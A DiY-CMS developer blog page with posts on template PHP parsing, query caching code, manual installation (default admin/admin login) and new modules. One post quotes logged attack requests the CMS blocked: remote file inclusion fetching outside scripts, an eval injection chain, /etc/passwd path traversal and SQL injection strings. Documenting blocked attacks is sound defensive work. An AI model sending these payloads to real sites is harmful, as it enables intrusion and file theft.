DiY-CMS

New DiY-CMs features 2: adding code to templates and imporving update system

  By: admin    Date Added: Wednesday 09-02-2011 02:46 pm

In my last blog I talked about the new updates that I developed for DiY-CMS. I talked about the cache system and in this blog I will be talking about the other two new improvements, namely: adding php code to main templates and improving the update system in the control panel.

One of the most needed features was to allow code to be inserted and parsed into templates of DiY-CMS themes. Adding code provides great flexibility for designing creating dynamic themes. I have changed the way that main templates are parsed within DiY-CMS. Eval() function is no longer used for parsing as it is frowned upon by many developers due to security risks it might poses as well as its inability to parse PHP code inside templates (in the case of DiY-CMS) without number of unnecessary modifications to the CMS.

So what is the benefit of enabling code parsing within main templates? The main advantage is that creating theme would be easier and more dynamic. For instance one could use condition statements (one of the common used statements in themes) to change a colour, a column or practically anything else. One can even add functions or any snippet of code he might like to the theme that he is creating. The second advantage is that I am working of developing theme settings in which this change comes in handy. Meaning that a designer would add settings to his theme, these settings can be modified by a general user through an interface and the designer will incorporate PHP code to modify the look and feel of the theme based on these settings.

Since now PHP code is accepted within main templates one can use the standard PHP file inclusion function rather than DiY-CMS style, for instance to include the file ‘blocks/tags.block.php’ instead of using:

<!--INC dir="blocks" file="tags.block.php" -->

One could use this style:

<?php include('blocks/ tags.block.php'); ?>

I have mentioned earlier that eval() function is no longer used, and that means that variables inside the main templates will not be rendered correctly (variables are the words preceded by the dollar sing $). For example $index_middle will not render correctly and it needs to be enclosed by php tags like so:

<?php echo $index_middle; ?>

I have updated all the themes in the download center to conform to the new system, and – hopefully – you would not have problems installing or running them on your website.
The second update I will be taking about in this blog is the improvement of the update system in the control panel. I have made number of improvements to the underlying code of the system and modified it to retrieve data in JSON format from DiY-CMS official website. This will allow for a more efficient and smooth process of updates. Also I improved the system to accept ZIP files. Using this feature the website administrator would be able to install a bunch of updates in one click. In order for this feature to work you need the ZIP Library installed on your hosting server. It is mostly installed, but if it is not you can ask your hosting to install it for you.
I wish that these features would be in great help for all the user of DiY-CMS, and I hope to hear your opinions in the comments.

Tags: updates, features, php-code More details

New DiY-CMs features 1: reducing queries by 50-85%

  By: admin    Date Added: Wednesday 09-02-2011 01:46 pm

After I finished programming my first app for facebook - Friends Stat, I started thinking about new ways to improve DiY-CMS. I have many ideas to develop but there are three features of them which I believe are important. They are: cache system to minimise mysql queries, adding php code into main templates and improving the update system in DiY-CMS control panel.

I will explain the first feature in this blog and then talk about the rest in later blogs.
Cache system is developed to ease the process of retrieving data from database. In other words cache system saves the results of repetitive queries that do not change often into files and then retrieve the data from these files rather that querying database again and again. As you might have guessed by now, this process will reduce the load on database and increase the cms performance.

In DiY-CMS there are number of queries that do not change often such as general settings, module settings, plugins details, themes, templates and other queries. Cache system will save the results of each one of these queries to a single file and place it in cache folder. Once a query is requested in the front-end DiY-CMS will check if there is a cache file relevant to that query and retrieve results saved in it, otherwise the query will run normally.

Cache files do not have expiry data, so files would remain for unlimited period of time. What if I make changes to settings, theme or templates? In this case the relevant cache file would be updated automatically once changes occur in the control panel. Also, you can remove cache files manually from Cache folder any time you whish and DiY-CMS will create new cache files.

This feature reduces mysql queries and therefore increases overall performance. In some pages of DiY-CMS queries reached as little as 1 query per page. Certainly the number of queries cached would be different from module to another and one page to other pages but on average mysql queries have been minimised by 50-85%. See chart below.

Furthermore, you can use this system to cache queries that you might use in modules, plugins or blocks you develop for DiY-CMS. Implementing cache is easy and requires three functions one to create the cache file, second one to check file existence.

Say we have this query that we want to cache:

$result = $diy_db->query("SELECT variable,value FROM diy_settings");

You would be place this code in the place where the data of diy_settings is updated:

// Query database table 

while ($row = $diy_db->dbarray($query_result)) {

        $key         = $row['variable'];

        $array[$key] = $row['value'];

        }

 

// create a cache file and save data into it

$diy_db->create_query_cache_file('global_settings', $array);

Notice that create_query_cache_file() function takes two parameters, the first one is the file name and the second one is query data that needs to be cached.

Then you would use this code to check for the file and retrieve its data:

// check if file exists

$cahce = $diy_db->check_query_cache_file('global_settings');

if ($cahce) {

    // if file exists retrieve its data and place them in a varaible

    $array = $diy_db->get_query_cache_file('global_settings');

} else {

    // if file does not exist proceed with query as normal

    $result = $diy_db->query("SELECT variable,value FROM diy_settings");

     

    while ($row = $diy_db->dbarray($result, $i++)) {

        $key         = $row['variable'];

        $array[$key] = $row['value'];

    }

}

// here $array data can be used as whished

In the last code snippet there are two important functions, the first one is check_query_cache_file() which checked if file exists and the second retrieve data from the cache file. Both functions take one parameter and it is the file name that we creates using create_query_cache_file() fcuntion.

I hope that this blog provides some insights into the feature of DiY-CMS and how to use them.

In next blog I will explain the rest of features.

Tags: updates-diy-cms-mysql More details

Yeah! Preventing more than 3000 hacking attempts

  By: admin    Date Added: Wednesday 03-11-2010 09:27 am

Security is one of most important criteria in any script one would like to use. In this post I will talk about the security in DiY-CMS. DiY-CMS has the ability to prevent and record most hacking attempts.
Since April 11th http://www.diy-cms.com has prevented more than 3000 hacking attempts in both the English and the Arabic sections. Bear in mind that these are only the recorded attempts, SQL injection through forms, for example, are prevented but not recorded for number of reasons.

Attempts example:
Several methods were used to hack into the DiY-CMS, they include remote file inclusion, sql injection and attempt to access root folders and files.
Here are few examples:

Remote file inclusion (I replaced original site names with SITE-NAME):

/mod.php?mod=http://www. SITE-NAME.com.mx/admin/xroot.txt?

/?path=http://stul. SITE-NAME.cz/img/.jancuk/injek.txt??



/mod.php?mod=download&modfile=view_file&downid=1%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://nic. SITE-NAME.edu.cn/media/j1.txt???



/index.php//openi-admin/base/fileloader.php?config[openi_dir]=http://SITE-NAME.co.kr/poll/aipi/id.txt??



/index.php//cms/system/openengine.php?oe_classpath=http://SITE-NAME.org/Scripts/bogel/id1.txt????



 /mod.php?mod=http://SITE-NAME.com/admin/images/index.txt?

Accessing root files and folders:

//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00



/mod.php?mod=../../../../../../../../../../../../../../../etc/passwd%00

 /cgi-bin/htdocs

/cgi-bin/logs

/cgi-bin/root



/mod.php?mod=http://jmbioanalises.com.br/Lims/images/g.txt?

SQL injection:

 /mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null%20where%20"x"="x



 /mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,null%20where%20"x"="x



/mod.php?mod=27%20AND%20ascii(substring((SELECT%20distinct%20table_name%20FROM%20information_schema.tables%20Where%20table_schema=0x202020%20limit%2019,1),3,1))



/mod.php?mod=blog&modfile=index&page=2&start=10%20union%20select%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*%20and%201=1

Geographic locations:
Attempts were initiated from more than 50 countries. Here is a graph of the top 6 countries where attempts originated from:

And here is a full list of countries where attempts originated from with the number of attempts:
Brazil => 52
United States => 52
Republic of Korea => 13
Saudi Arabia => 12
Germany => 7
United Kingdom => 7
Oman => 6
Morocco => 6
Algeria => 5
Palestinian Territory => 5
France => 5
Italy => 5
Turkey => 5
Indonesia => 4
Canada => 4
Netherlands => 4
Australia => 4
Russian Federation => 4
Belgium => 3
Kuwait => 3
Bulgaria => 3
Hungary => 3
Iraq => 2
Islamic Republic of Iran => 2
Czech Republic => 2
Poland => 2
Bahamas => 2
Austria => 2
Malaysia => 2
Japan => 2
Slovakia => 1
Ukraine => 1
South Africa => 1
Norway => 1
Belarus => 1
Argentina => 1
Azerbaijan => 1
Peru => 1
Bahrain => 1
Egypt => 1
Denmark => 1
Israel => 1
Thailand => 1
Syrian Arab Republic => 1
Latvia => 1
Martinique => 1
India => 1
Libyan Arab Jamahiriya => 1
Europe => 1
Mexico => 1
Greece => 1
Tunisia => 1


I hope that this post explains how powerful DiY-CMS when it comes to security and preventing hacking attempts, and I will always add more security measures to it.

If you want to check the types of hacking attempts your site is getting you can check “html/bugs.txt” file for the list of all hacking attempts.

Tags: prevent-hacking- More details

How to install DiY-CMS manually

  By: admin    Date Added: Thursday 14-10-2010 03:13 am

If you ever ran into an issue during the installation process of diy-cms this blog will solve your problems using the good old manual way. In this blog I will explain how to install DiY-CMS on the local server on your website manually and without the built-in installation wizard.


First of all we need to create a database using phpMyAdmin. Open phpmyadmin and then create a database as shown in image 1 below. Make sure that you select the utf-8 encoding to both database encoding and connection collation. This is to ensure that DiY-CMS will function correctly when displaying non-English characters or using a different language such as Arabic, Hebrew, Chinese or other languages.

Image 1

Second step: click on import at the top of the page. Then import this file “install/install.sql” to the database as shown in image 2.

Image 2

Third step: Remove install folder from the DiY-CMS folder.

Forth Step: open file “admin/conf.php” and replace the values between the curly brackets {} (along with the {} themselves} with the appropriate values:

$CONF['dbname']          = "{server_db}"; // Database name

$CONF['dbuser']          = "{server_un}"; // Database user

$CONF['dbpword']         = "{server_pass}"; // Database password



$CONF['site_path']       = "{path}"; // Path to your site

$CONF['upload_path']     = "{uppath}"; // Path to the upload folder

$CONF['site_url']        = '{sitelink}'; // website URL

$CONF['site_mail']       = "{sitemail}"; // Website Email

$CONF['site_title']      = "{sitetitle}";  // Website Title

$CONF['cookie_domain']   = '{domain}'; // Website URL 

Final Step: At this stage you would be able to login to your website using these credentials:
Username: admin
Password: admin

Change your password to whatever you want then customize the CMS to your needs.

I hope this tutorial was useful.

Tags: install, manual More details

Finally, a DiY-CMS / vBulletin bridge

  By: admin    Date Added: Friday 24-09-2010 01:04 pm

Finally, I was able to create a bridge between DiY-CMS and vBulletin forum. I designed the bridge in the form of a plug-in so it is easir for adminisitrators to control it. The plugin would unify registration and login in DiY-CMS and vBulletin forums.

The plguin will:
1- Unify registration. User would have to register once using the same registration form.
2- Unify login, through DiY-CMS only.
3- Unify logout, through DiY-CMS only.
4- Import users who registered through vBulletin forms.

Installation:
1- Download plug-in from this link: http://www.diy-cms.com/mod.php?mod=download&modfile=view_file&downid=30

2- Extract the contents of the zip file and then upload the folder to the plugins folder in your website.

3- Open config.php inside the plug-in folder and edit this line:

define('FORUMPATH', 'D:/xampp/htdocs/vb/'); // path to your forum 

Change D:/xampp/htdocs/vb/ to the path of vBulltein forums on your website.

4- Install the plug-in through the admin panel. In the plug-in setup tick users module only. You can select other modules, however this will increase the database enquires number and the plug-in is programmed to be working only on the users module (since that is all it needs to function correctly)

5- In the plug-in settings you will see the following:

Select the new users group. Link DiY-CMS groups to the corresponding vBulltein forum groups.

Import users to DiY-CMS by clicking on the green button. You have to repeat the last step (the importing part) from time to time in order to import users who users who register through vBulltein.

Alternatively you can disable registration at the vbulletin and enable it only through DiY-CMS

Tags: vbulltein-bridge, diy-cms More details

Blog module for DiY-CMS

  By: admin    Date Added: Tuesday 31-08-2010 01:39 pm

Hi
As promised, I made the blog module available for download. This website is a live example of the blog module.

Module features:
- Unlimited categories and subcategories.
- Groups-based permissions for adding and editing posts.
- ability to add tags to blogs.
- and many more.

to download the module:
http://www.diy-cms.com/download/view_file/downid_27

Tags: blog, module, diy-cms More details

Video module 1.0

  By: admin    Date Added: Wednesday 28-07-2010 04:25 pm

Hi
Today I present you with the video module. It enables users to add videos to your website. Users can add videos either by uploading files from their computers or adding the embed link using any of the video sharing websites.

Module features:
- Unlimited categories and subcategories.
- Multiple video upload at the same time.
- Set video types allowed for upload
- Using group settings you can set the size of video uploaded
- and many more.

to download the module:
http://www.diy-cms.com/download/view_file/downid_29

Tags: video, cms More details

CK-Editor Plugin

  By: admin    Date Added: Thursday 22-07-2010 09:25 am

This plugin will add a WYSIWYG (what you see is what you get) editor or a visual html editor. It replaces the tinymce editor (the defualt editor for DiY-CMS) with the CKEditor with many options.

Here is the editor image in action with Standard type selected:

First to install the plugin you need to upload the folder to the plugins directory in DiY-CMS root folder. Then you can install it from the admin area by going to plugins sections and then click on the install icon.

Second you may modifey the plugin settings as you need.
You can modifey the skin, the toolbar type, the toolbar location and many more.

Here is the setting image:

You can download the plugin from this link:
http://www.diy-cms.com/download/view_file/downid_28

Tags: ckeditor, plugin More details

Friendly Links plugin

  By: admin    Date Added: Thursday 15-07-2010 09:57 am

Hi
I have programmed a new plguin for DiY-CMS. It basically converts most of the links in DiY-CMS from dynamic to static.

So links like this:
http://www.diy-cms.com/mod.php?mod=download&modfile=view_file&downid=26

would be converted to his:
http://www.diy-cms.com/download/view_file/downid_26


to download the plugin follow any of the links above :)

hopefully in the next blogs i will be talking about how to write a plugin for diy-cms using the hooks system

Tags: plugins, firendly-links, diy-cms More details

Gallery module for diy-cms

  By: admin    Date Added: Thursday 01-07-2010 12:55 pm

Hi
Couple of weeks I started planning to program three modules for DiY-CMS which I thought are necessary for the completion of the CMS. They are gallery, audio and video modules.

Here is the first one, the gallery module. To download it Click Here.

Features:
- Unlimited categories and subcategories.
- Multiple images upload at the same time.
- Three types of listing: Title & photo, Photo Only or Title only.
- Add Copyright text
- Customise copyright colour and position.
- and many more.

Here is the image of the image listing in a category with photo and title type:


and this is the screenshot for viewing a single photo:

Tags: gallery, diycms, module More details